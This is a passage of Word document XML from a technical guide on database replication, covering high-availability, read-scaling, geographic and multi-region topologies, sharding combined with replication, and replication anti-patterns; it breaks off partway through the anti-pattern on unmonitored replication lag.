    <w:p w14:paraId="5A81BF3F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Intermediates relay to their downstream replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E92B49F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>Trade: additional hop of lag for downstream replicas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D27FE59" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:pict w14:anchorId="2E02F3AC">
          <v:rect id="_x0000_i5651" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="225553DB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14. Replication Topologies for Specific Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7EC2E3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.1 High Availability (HA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20075F80" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E76D97" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Goal: Minimize downtime on primary failure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A642D9F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="6036F896" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EB8BCD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Primary (us-east-1a) ←sync→ Standby (us-east-1b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625F143B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Automated failover via Patroni/RDS Multi-AZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749816B0" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AB566D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  RTO: 30–60 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1F4A13" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  RPO: 0 (synchronous)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04697068" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Read scaling: limited (sync standby used for HA, not reads typically)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C09ED6B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.2 Read Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E5FF16" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2977A0F9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Goal: Handle 10x more read traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6729DA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="29BD6F48" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6362E3F6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Primary (writes only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D04728" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  5 async read replicas (reads distributed via load balancer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4846ADDC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A88B314" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  RTO: 30–60 seconds (promote any replica)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494ADE28" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  RPO: replication lag (~10ms typically)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583980D7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Consistency: eventual (reads may be slightly stale)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3110AFEB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.3 Geographic Distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68398EDA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032A4227" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Goal: Low-latency reads globally + disaster recovery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07387670" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="1C2456DF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39256B9D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Primary cluster: us-east-1 (writes from US users)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9E42FB" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Read replica: eu-west-1 (reads for EU users)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317C90B8" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Read replica: ap-southeast-1 (reads for Asia users)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C8AE4D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D37014" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Write latency: low (local primary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="457F7A45" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Read latency: low (local replica, 5–20ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46827C16" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Cross-region lag: 50–200ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DF3BB9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14.4 Multi-Region Active-Active</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D02F8FC" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461687AE" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Goal: Low-latency writes globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695FF786" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="21A7BD4D" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1602D9" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Leader A: us-east-1 (handles writes for US-sharded data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56780A6F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Leader B: eu-west-1 (handles writes for EU-sharded data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563528BA" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Cross-replication: async bidirectional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506850B2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Conflict resolution: per-entity home region (no true conflicts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEC906F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6DCF03" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  OR (CockroachDB/Spanner):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AB7404" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Consensus-based replication with quorum-aware placement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398E93B2" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Leaseholder for each range in closest region to its users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC4F021" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:pict w14:anchorId="424ADD5C">
          <v:rect id="_x0000_i5652" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="773CDB01" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15. Replication and Sharding Combined</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AABE54" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>15.1 Sharding + Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55549E37" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A468E01" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>In production, you typically COMBINE sharding (for write scaling) with replication (for HA + read scaling):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC29706" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="1728B925" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Shard 1: [Primary] [Replica A] [Replica B]  ← Customers 1–1M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10536C94" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Shard 2: [Primary] [Replica A] [Replica B]  ← Customers 1M–2M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B791CB7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Shard 3: [Primary] [Replica A] [Replica B]  ← Customers 2M–3M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204F861A" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="25D86365" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Total:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7969EC42" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Write capacity: 3x (one primary per shard, independent writes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F99A69F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Read capacity: 9x (3 shards × 3 nodes each)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749A0B55" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Availability: each shard survives 1 node failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B1B988" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t xml:space="preserve">  Data: partitioned by customer_id range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412787C6" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15.2 MongoDB Sharded Cluster (Example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249089F4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58091301" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Shard 1 (Replica Set): Primary + 2 Secondaries → chunk A, B, C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F2B047F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Shard 2 (Replica Set): Primary + 2 Secondaries → chunk D, E, F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605874FF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Shard 3 (Replica Set): Primary + 2 Secondaries → chunk G, H, I</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C8D3407" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="1011BEC5" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Config Servers (Replica Set): Metadata about chunk distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D05752" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Mongos (Routers): Route queries to correct shard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB2B0C4" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D"/>
    <w:p w14:paraId="74343015" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Each shard is independently replicated (HA per shard).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11259084" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Sharding provides write scaling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6925C73B" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replication within each shard provides read scaling + HA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695913DF" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="4D1ADE06">
          <v:rect id="_x0000_i5653" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="195C525E" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16. Replication Anti-Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D09966" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.1 Writing to Replicas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9988D7" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The mistake:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Allowing writes on a read replica (accidentally or by design without proper conflict handling).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53236F14" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why it's catastrophic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11693D57" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1541"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Replica data diverges from primary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D62FBBD" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1541"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Next WAL replay from primary conflicts with local writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29603FED" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1541"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:t>Data corruption, replication breaks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C813EC3" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prevention:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Configure replicas as strictly read-only (hot_standby = on in PostgreSQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3551AC9C" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16.2 Not Monitoring Replication Lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1957BA8F" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The mistake:</w:t>
      </w:r>
      <w:r w:rsidRPr="00496A4D">
        <w:t> Assuming replicas are "close enough" without measuring.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559CCA47" w14:textId="77777777" w:rsidR="00496A4D" w:rsidRPr="00496A4D" w:rsidRDefault="00496A4D" w:rsidP="00496A4D">
      <w:r w:rsidRPr="00496A4D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What goes wrong:</w:t>
      </w:r>
    </w:p>
